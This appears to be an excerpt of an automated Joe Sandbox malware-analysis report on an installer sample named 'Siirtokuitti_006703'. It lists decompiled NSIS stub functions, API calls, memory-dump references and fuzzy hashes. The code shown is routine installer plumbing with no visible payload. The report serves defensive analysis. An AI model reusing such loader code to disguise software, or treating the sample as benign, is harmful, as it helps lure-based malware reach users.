                                                                                                                      0x00402e53

                                                                                                                      APIs
                                                                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                                                                                                      • wsprintfW.USER32 ref: 00402E29
                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E39
                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                      • Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                      • Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
                                                                                                                      • Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
                                                                                                                      • Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 76%
                                                                                                                      			E100024A4(intOrPtr* _a4) {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr* _t24;
                                                                                                                      				void* _t26;
                                                                                                                      				intOrPtr _t27;
                                                                                                                      				signed int _t35;
                                                                                                                      				void* _t39;
                                                                                                                      				intOrPtr _t40;
                                                                                                                      				void* _t43;
                                                                                                                      
                                                                                                                      				_t39 = E1000121B();
                                                                                                                      				_t24 = _a4;
                                                                                                                      				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                                                                                                      				_v4 = _t40;
                                                                                                                      				_t43 = (_t40 + 0x81 << 5) + _t24;
                                                                                                                      				do {
                                                                                                                      					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                                                                                                      					}
                                                                                                                      					_t35 =  *(_t43 - 8);
                                                                                                                      					if(_t35 <= 7) {
                                                                                                                      						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                                                                                                      							case 0:
                                                                                                                      								 *_t39 =  *_t39 & 0x00000000;
                                                                                                                      								goto L15;
                                                                                                                      							case 1:
                                                                                                                      								_push( *__eax);
                                                                                                                      								goto L13;
                                                                                                                      							case 2:
                                                                                                                      								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                      								goto L14;
                                                                                                                      							case 3:
                                                                                                                      								__ecx =  *0x1000406c;
                                                                                                                      								__edx = __ecx - 1;
                                                                                                                      								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                                                                                                      								__eax =  *0x1000406c;
                                                                                                                      								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                                                                                                      								goto L15;
                                                                                                                      							case 4:
                                                                                                                      								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                                                                                                      								goto L15;
                                                                                                                      							case 5:
                                                                                                                      								_push( *0x1000406c);
                                                                                                                      								_push(__edi);
                                                                                                                      								_push( *__eax);
                                                                                                                      								__imp__StringFromGUID2();
                                                                                                                      								goto L15;
                                                                                                                      							case 6:
                                                                                                                      								_push( *__esi);
                                                                                                                      								L13:
                                                                                                                      								__eax = wsprintfW(__edi, __ebp);
                                                                                                                      								L14:
                                                                                                                      								__esp = __esp + 0xc;
                                                                                                                      								goto L15;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					L15:
                                                                                                                      					_t26 =  *(_t43 + 0x14);
                                                                                                                      					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                                                                                                      						GlobalFree(_t26);
                                                                                                                      					}
                                                                                                                      					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                                                                                                      					if(_t27 != 0) {
                                                                                                                      						if(_t27 != 0xffffffff) {
                                                                                                                      							if(_t27 > 0) {
                                                                                                                      								E100012E1(_t27 - 1, _t39);
                                                                                                                      								goto L24;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E10001272(_t39);
                                                                                                                      							L24:
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					_v4 = _v4 - 1;
                                                                                                                      					_t43 = _t43 - 0x20;
                                                                                                                      				} while (_v4 >= 0);
                                                                                                                      				return GlobalFree(_t39);
                                                                                                                      			}











                                                                                                                      0x100024ae
                                                                                                                      0x100024b0
                                                                                                                      0x100024bf
                                                                                                                      0x100024c5
                                                                                                                      0x100024d2
                                                                                                                      0x100024d4
                                                                                                                      0x100024d8
                                                                                                                      0x100024d8
                                                                                                                      0x100024e0
                                                                                                                      0x100024e6
                                                                                                                      0x100024e8
                                                                                                                      0x00000000
                                                                                                                      0x100024ef
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100024f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100024ff
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002506
                                                                                                                      0x1000250c
                                                                                                                      0x10002518
                                                                                                                      0x1000251e
                                                                                                                      0x10002523
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x10002545
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1000252b
                                                                                                                      0x10002531
                                                                                                                      0x10002532
                                                                                                                      0x10002534
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x1000254d
                                                                                                                      0x1000254f
                                                                                                                      0x10002551
                                                                                                                      0x10002553
                                                                                                                      0x10002553
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x100024e8
                                                                                                                      0x10002556
                                                                                                                      0x10002556
                                                                                                                      0x1000255b
                                                                                                                      0x1000256d
                                                                                                                      0x1000256d
                                                                                                                      0x10002573
                                                                                                                      0x10002578
                                                                                                                      0x1000257d
                                                                                                                      0x10002589
                                                                                                                      0x1000258e
                                                                                                                      0x00000000
                                                                                                                      0x10002593
                                                                                                                      0x1000257f
                                                                                                                      0x10002580
                                                                                                                      0x10002594
                                                                                                                      0x10002594
                                                                                                                      0x1000257d
                                                                                                                      0x10002595
                                                                                                                      0x10002599
                                                                                                                      0x1000259c
                                                                                                                      0x100025b3

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19421717588.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19421678749.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421756473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19421792485.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1780285237-0
                                                                                                                      • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                      • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                                                                      • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                                                                      • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E004028A7(void* __ebx) {
                                                                                                                      				void* _t26;
                                                                                                                      				long _t31;
                                                                                                                      				void* _t45;
                                                                                                                      				void* _t49;
                                                                                                                      				void* _t51;
                                                                                                                      				void* _t54;
                                                                                                                      				void* _t55;
                                                                                                                      				void* _t56;
                                                                                                                      
                                                                                                                      				_t45 = __ebx;
                                                                                                                      				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                                                                                                      				_t50 = E00402C37(0xfffffff0);
                                                                                                                      				 *(_t56 - 0x38) = _t23;
                                                                                                                      				if(E00405CF8(_t50) == 0) {
                                                                                                                      					E00402C37(0xffffffed);
                                                                                                                      				}
                                                                                                                      				E00405E7D(_t50);
                                                                                                                      				_t26 = E00405EA2(_t50, 0x40000000, 2);
                                                                                                                      				 *(_t56 + 8) = _t26;
                                                                                                                      				if(_t26 != 0xffffffff) {
                                                                                                                      					_t31 =  *0x42a258;
                                                                                                                      					 *(_t56 - 0x3c) = _t31;
                                                                                                                      					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                      					if(_t49 != _t45) {
                                                                                                                      						E00403441(_t45);
                                                                                                                      						E0040342B(_t49,  *(_t56 - 0x3c));
                                                                                                                      						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                      						 *(_t56 - 0x4c) = _t54;
                                                                                                                      						if(_t54 != _t45) {
                                                                                                                      							E004031BA(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                                                      							while( *_t54 != _t45) {
                                                                                                                      								_t47 =  *_t54;
                                                                                                                      								_t55 = _t54 + 8;
                                                                                                                      								 *(_t56 - 0x34) =  *_t54;
                                                                                                                      								E00405E5D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                      								_t54 = _t55 +  *(_t56 - 0x34);
                                                                                                                      							}
                                                                                                                      							GlobalFree( *(_t56 - 0x4c));
                                                                                                                      						}
                                                                                                                      						E00405F54( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                                                                                                      						GlobalFree(_t49);
                                                                                                                      						 *((intOrPtr*)(_t56 - 0x30)) = E004031BA(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                      					}
                                                                                                                      					CloseHandle( *(_t56 + 8));
                                                                                                                      				}
                                                                                                                      				_t51 = 0xfffffff3;
                                                                                                                      				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                                                                                                      					_t51 = 0xffffffef;
                                                                                                                      					DeleteFileW( *(_t56 - 0x38));
                                                                                                                      					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                      				}
                                                                                                                      				_push(_t51);
                                                                                                                      				E00401423();
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}











                                                                                                                      0x004028a7
                                                                                                                      0x004028a9
                                                                                                                      0x004028b5
                                                                                                                      0x004028b8
                                                                                                                      0x004028c2
                                                                                                                      0x004028c6
                                                                                                                      0x004028c6
                                                                                                                      0x004028cc
                                                                                                                      0x004028d9
                                                                                                                      0x004028e1
                                                                                                                      0x004028e4
                                                                                                                      0x004028ea
                                                                                                                      0x004028f8
                                                                                                                      0x004028fd
                                                                                                                      0x00402901
                                                                                                                      0x00402904
                                                                                                                      0x0040290d
                                                                                                                      0x00402919
                                                                                                                      0x0040291d
                                                                                                                      0x00402920
                                                                                                                      0x0040292a
                                                                                                                      0x00402949
                                                                                                                      0x00402931
                                                                                                                      0x00402936
                                                                                                                      0x0040293e
                                                                                                                      0x00402941
                                                                                                                      0x00402946
                                                                                                                      0x00402946
                                                                                                                      0x00402950
                                                                                                                      0x00402950
                                                                                                                      0x0040295d
                                                                                                                      0x00402963
                                                                                                                      0x00402975
                                                                                                                      0x00402975
                                                                                                                      0x0040297b
                                                                                                                      0x0040297b
                                                                                                                      0x00402986
                                                                                                                      0x00402987
                                                                                                                      0x0040298b
                                                                                                                      0x0040298f
                                                                                                                      0x00402995
                                                                                                                      0x00402995
                                                                                                                      0x0040299c
                                                                                                                      0x00402245
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402950
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2667972263-0
                                                                                                                      • Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                      • Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
                                                                                                                      • Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
                                                                                                                      • Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 77%
                                                                                                                      			E00404BD0(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                      				char _v68;
                                                                                                                      				char _v132;
                                                                                                                      				void* __ebx;
                                                                                                                      				void* __edi;
                                                                                                                      				void* __esi;
                                                                                                                      				signed int _t23;
                                                                                                                      				signed int _t24;
                                                                                                                      				void* _t31;
                                                                                                                      				void* _t33;
                                                                                                                      				void* _t34;
                                                                                                                      				void* _t44;
                                                                                                                      				signed int _t46;
                                                                                                                      				signed int _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				signed int _t55;
                                                                                                                      
                                                                                                                      				_t23 = _a16;
                                                                                                                      				_t53 = _a12;
                                                                                                                      				_t44 = 0xffffffdc;
                                                                                                                      				if(_t23 == 0) {
                                                                                                                      					_push(0x14);
                                                                                                                      					_pop(0);
                                                                                                                      					_t24 = _t53;
                                                                                                                      					if(_t53 < 0x100000) {
                                                                                                                      						_push(0xa);
                                                                                                                      						_pop(0);
                                                                                                                      						_t44 = 0xffffffdd;
                                                                                                                      					}
                                                                                                                      					if(_t53 < 0x400) {
                                                                                                                      						_t44 = 0xffffffde;
                                                                                                                      					}
                                                                                                                      					if(_t53 < 0xffff3333) {
                                                                                                                      						_t52 = 0x14;
                                                                                                                      						asm("cdq");
                                                                                                                      						_t24 = 1 / _t52 + _t53;
                                                                                                                      					}
                                                                                                                      					_t25 = _t24 & 0x00ffffff;
                                                                                                                      					_t55 = _t24 >> 0;
                                                                                                                      					_t46 = 0xa;
                                                                                                                      					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                      				} else {
                                                                                                                      					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                      					_t50 = 0;
                                                                                                                      				}
                                                                                                                      				_t31 = E004063D2(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                      				_t33 = E004063D2(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                      				_t34 = E004063D2(_t44, _t50, 0x423728, 0x423728, _a8);
                                                                                                                      				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                      				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
                                                                                                                      			}



















                                                                                                                      0x00404bd9
                                                                                                                      0x00404bde
                                                                                                                      0x00404be6
                                                                                                                      0x00404be7
                                                                                                                      0x00404bf4
                                                                                                                      0x00404bfc
                                                                                                                      0x00404bfd
                                                                                                                      0x00404bff
                                                                                                                      0x00404c01
                                                                                                                      0x00404c03
                                                                                                                      0x00404c06
                                                                                                                      0x00404c06
                                                                                                                      0x00404c0d
                                                                                                                      0x00404c13
                                                                                                                      0x00404c13
                                                                                                                      0x00404c1a
                                                                                                                      0x00404c21
                                                                                                                      0x00404c24
                                                                                                                      0x00404c27
                                                                                                                      0x00404c27
                                                                                                                      0x00404c2b
                                                                                                                      0x00404c3b
                                                                                                                      0x00404c3d
                                                                                                                      0x00404c40
                                                                                                                      0x00404be9
                                                                                                                      0x00404be9
                                                                                                                      0x00404bf0
                                                                                                                      0x00404bf0
                                                                                                                      0x00404c48
                                                                                                                      0x00404c53
                                                                                                                      0x00404c69
                                                                                                                      0x00404c7a
                                                                                                                      0x00404c96

                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
                                                                                                                      • wsprintfW.USER32 ref: 00404C7A
                                                                                                                      • SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                      • String ID: %u.%u%s%s$(7B
                                                                                                                      • API String ID: 3540041739-1320723960
                                                                                                                      • Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                      • Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
                                                                                                                      • Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
                                                                                                                      • Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                                                                                                      				signed int _t14;
                                                                                                                      				int _t17;
                                                                                                                      				int _t24;
                                                                                                                      				signed int _t29;
                                                                                                                      				intOrPtr* _t32;
                                                                                                                      				void* _t34;
                                                                                                                      				void* _t35;
                                                                                                                      				void* _t38;
                                                                                                                      				signed int _t40;
                                                                                                                      
                                                                                                                      				_t32 = __esi;
                                                                                                                      				_t24 = __ebx;
                                                                                                                      				_t14 =  *(_t35 - 0x20);
                                                                                                                      				_t38 = __edx - 0x38;
                                                                                                                      				 *(_t35 - 0x4c) = _t14;
                                                                                                                      				_t27 = 0 | _t38 == 0x00000000;
                                                                                                                      				_t29 = _t38 == 0;
                                                                                                                      				if(_t14 == __ebx) {
                                                                                                                      					if(__edx != 0x38) {
                                                                                                                      						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                                                                                                      					} else {
                                                                                                                      						E00402C37(0x21);
                                                                                                                      						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp\System.dll", 0x400, __ebx, __ebx);
                                                                                                                      						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp\System.dll");
                                                                                                                      					}
                                                                                                                      				} else {
                                                                                                                      					E00402C15("true");
                                                                                                                      					 *0x40add8 = __ax;
                                                                                                                      					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                                                                                                      				}
                                                                                                                      				 *(_t35 + 8) = _t17;
                                                                                                                      				if( *_t32 == _t24) {
                                                                                                                      					L13:
                                                                                                                      					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                      				} else {
                                                                                                                      					_t34 = E00406310(_t27, _t32);
                                                                                                                      					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405F83(_t34, _t34) >= 0) {
                                                                                                                      						_t14 = E00405F54(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsl3DD.tmp\System.dll",  *(_t35 + 8));
                                                                                                                      						_t40 = _t14;
                                                                                                                      						if(_t40 == 0) {
                                                                                                                      							goto L13;
                                                                                                                      						}
                                                                                                                      					} else {
                                                                                                                      						goto L13;
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                      				return 0;
                                                                                                                      			}












                                                                                                                      0x00402592
                                                                                                                      0x00402592
                                                                                                                      0x00402592
                                                                                                                      0x00402597
                                                                                                                      0x0040259a
                                                                                                                      0x0040259d
                                                                                                                      0x004025a2
                                                                                                                      0x004025a4
                                                                                                                      0x004025c4
                                                                                                                      0x00402602
                                                                                                                      0x004025c6
                                                                                                                      0x004025c8
                                                                                                                      0x004025e2
                                                                                                                      0x004025ed
                                                                                                                      0x004025ed
                                                                                                                      0x004025a6
                                                                                                                      0x004025a8
                                                                                                                      0x004025ad
                                                                                                                      0x004025bb
                                                                                                                      0x004025be
                                                                                                                      0x00402607
                                                                                                                      0x0040260a
                                                                                                                      0x00402885
                                                                                                                      0x00402885
                                                                                                                      0x00402610
                                                                                                                      0x00402619
                                                                                                                      0x0040261b
                                                                                                                      0x0040263a
                                                                                                                      0x004015b4
                                                                                                                      0x004015b6
                                                                                                                      0x00000000
                                                                                                                      0x004015bc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040261b
                                                                                                                      0x00402ac2
                                                                                                                      0x00402ace

                                                                                                                      APIs
                                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl3DD.tmp$C:\Users\user\AppData\Local\Temp\nsl3DD.tmp\System.dll
                                                                                                                      • API String ID: 3109718747-2809097506
